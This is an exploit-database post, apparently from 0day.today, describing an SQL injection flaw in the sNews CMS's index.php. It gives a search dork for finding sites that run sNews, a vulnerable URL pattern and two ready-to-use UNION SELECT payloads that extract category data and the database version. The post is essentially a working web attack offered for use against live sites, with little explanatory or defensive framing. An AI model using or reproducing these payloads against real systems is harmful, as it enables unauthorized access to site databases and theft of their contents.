[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

sNews (index.php) SQL Injection Vulnerability

Author
MajoR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13461
Category
web applications
Date add
24-07-2010
Platform
php
=============================================
sNews (index.php) SQL Injection Vulnerability
=============================================


# Author: MajoR
 
# Software Link: http://snews.awddesign.co.uk
 
# Version: N/A
 
# Tested on: Wnidows xp SP2
 
# CVE : N/A
 
 
 
====================================================sNews (index.php) SQL Injection Vulnerability
===================================================
 
Author :   MajoR
Email  : Ma-j-oR@hotmail.fr
 
Dork: "Powered by sNews"
 
===================================================
 
 
[+] Vulnerable File :
 
http://www.Victime.com/sNews/index.php?id=
 
[+] ExploiT :
 
 
-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--
 

 
http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8


====================================================
 
 
Greetingz To SlaSSi & Xella



#  0day.today [2024-11-15]  #